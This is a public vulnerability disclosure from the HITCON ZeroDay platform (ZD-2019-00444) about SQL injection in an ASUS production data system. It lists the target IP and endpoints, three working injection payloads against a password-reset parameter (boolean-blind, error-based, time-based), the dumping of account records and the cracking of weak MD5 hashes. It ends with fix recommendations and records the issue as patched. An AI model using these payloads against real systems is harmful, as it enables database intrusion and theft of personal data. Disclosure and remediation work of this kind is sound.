Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-00444
- Vendor: 華碩電腦股份有限公司
- Title: 華碩生產資訊系統(Production Data System)
- Introduction: SQL Injection、Information Leakage
處理狀態
目前狀態
公開
Last Update : 2019/06/03
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2019/05/23 14:24:08 : 新提交 (由 Y 更新此狀態)
- 2019/05/23 22:17:55 : 新提交 (由 Y 更新此狀態)
- 2019/05/23 22:18:28 : 新提交 (由 Y 更新此狀態)
- 2019/05/23 22:32:08 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/05/25 19:11:13 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/05/25 19:11:13 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/05/29 16:14:11 : 複測申請中 (由 組織帳號 更新此狀態)
- 2019/05/30 08:09:51 : 確認已修補 (由 Y 更新此狀態)
- 2019/06/03 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-00444
- 通報者:airfore47 (Y)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
1.http://103.10.4.191
2.http://103.10.4.191/forgetPassword.php
3.http://103.10.4.191/test.php
4.http://103.10.4.191/check.php
2.http://103.10.4.191/forgetPassword.php
3.http://103.10.4.191/test.php
4.http://103.10.4.191/check.php
敘述
一、首頁
二、弱點有兩處
1.userId -> 需要驗證碼,只能手動測試
2.forgetEmailId -> forgetEmailId不需要驗證碼 可用程式跑
(1)boolean-based blind
=> payload : forgetEmailId=admin' RLIKE (SELECT (CASE WHEN (3949=3949) THEN 0x61646d696e ELSE 0x28 END))-- bGZC
(2)error-based
=> payload :forgetEmailId=admin' OR ROW(6827,6769)>(SELECT COUNT(),CONCAT(0x716a766a71,(SELECT (ELT(6827=6827,1))),0x7176786a71,FLOOR(RAND(0)2))x FROM (SELECT 6526 UNION SELECT 5412 UNION SELECT 4987 UNION SELECT 2686)a GROUP BY x)-- wJVI
(3)AND/OR time-based blind
=> payload :forgetEmailId=admin' OR SLEEP(5)-- zMqD
三、人員帳號資訊(密碼為md5)
四、嘗試爆hash,發現有弱密碼
五、phpinfoadmin
修補建議
一、修復網頁程式碼
二、增設找回密碼的驗證機制
三、限定企業內部IP登入
四、外網業務系統統一使用單一登入窗口(portal),ASUS有許多測試用的系統在外網可直接連線
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。